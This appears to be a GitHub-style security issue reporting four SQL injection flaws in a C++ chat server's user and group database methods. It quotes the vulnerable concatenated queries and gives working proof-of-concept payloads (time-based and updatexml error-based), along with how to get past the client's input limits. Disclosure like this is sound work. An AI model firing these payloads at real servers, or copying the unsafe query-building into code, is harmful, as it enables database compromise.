There are security risks in the operation of the server on the database
marckwei opened this issue · comments
issue 1
Vulnerability
There is a SQL injection vulnerability in the UserManager::addUser method.
The related business corresponding to the method is the registered account.
userid,username, nickname can be controlled, no filtering measures, and directly execute the entire SQL statement.
Looking at the code, it is found that the client does not encrypt the transmission data, and the registration information is returned to the server in clear text. Therefore, it can be injected directly in the client registration window.
bool UserManager::addUser(User& u)
{
……
……
……
char sql[256] = { 0 };
snprintf(sql, 256, "INSERT INTO t_user(f_user_id, f_username, f_nickname, f_password, f_register_time) VALUES(%d, '%s', '%s', '%s', NOW())", m_baseUserId.load(), u.username.c_str(), u.nickname.c_str(), u.password.c_str());
if (!pConn->execute(sql))
{
LOGW("insert user error, sql: %s", sql);
return false;
}
……
……
}Poc
payload:ad','ad','ads',sleep(10));# or ad','ad','ads',user());#
issue 2
Vulnerability
There is a SQL injection vulnerability in the UserManager::updateUserTeamInfoInDbAndMemory method.
newteaminfo can be controlled
bool UserManager::updateUserTeamInfoInDbAndMemory(int32_t userid, const std::string& newteaminfo)
{
……
……
std::ostringstream osSql;
osSql << "UPDATE t_user SET f_teaminfo='"
<< newteaminfo << "' WHERE f_user_id="
<< userid;
if (!pConn->execute(osSql.str().c_str()))
{
LOGE("Update Team Info error, sql: %s", osSql.str().c_str());
return false;
}
……
……
}Poc
The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program.
payload: 1"}]' or updatexml(2,concat(0x7e,version()),0) or'
issue 3
Vulnerability
There is a SQL injection vulnerability in the UserManager::addGroup method.
groupname can be controlled
bool UserManager::addGroup(const char* groupname, int32_t ownerid, int32_t& groupid)
{
……
……
++m_baseGroupId;
char sql[256] = { 0 };
snprintf(sql, 256, "INSERT INTO t_user(f_user_id, f_username, f_nickname, f_password, f_owner_id, f_register_time) VALUES(%d, '%d', '%s', '', %d, NOW())", m_baseGroupId.load(), m_baseGroupId.load(), groupname, ownerid);
if (!pConn->execute(sql))
{
LOGE("insert group error, sql: %s", sql);
return false;
}
……
……
} Create a group chat function can trigger this function.
payload: 1','','1',version());#
The client has an input length limit, but the defense of the client is invalid. Hard code the payload into the program.
Find the place where the client sends the json, and hard code the payload in.
issue 4
Vulnerability
There is a SQL injection vulnerability in the UserManager::updateUserInfoInDb method.
bool UserManager::updateUserInfoInDb(int32_t userid, const User& newuserinfo)
{
……
……
std::ostringstream osSql;
osSql << "UPDATE t_user SET f_nickname='"
<< newuserinfo.nickname << "', f_facetype="
<< newuserinfo.facetype << ", f_customface='"
<< newuserinfo.customface << "', f_gender="
<< newuserinfo.gender << ", f_birthday="
<< newuserinfo.birthday << ", f_signature='"
<< newuserinfo.signature << "', f_address='"
<< newuserinfo.address << "', f_phonenumber='"
<< newuserinfo.phonenumber << "', f_mail='"
<< newuserinfo.mail << "' WHERE f_user_id="
<< userid;
if (!pConn->execute(osSql.str().c_str()))
{
LOGE("UpdateUserInfo error, sql: %s", osSql.str().c_str());
return false;
}
……
……
}
Poc
payload:1' or updatexml(2,concat(0x7e,version()),0) or'
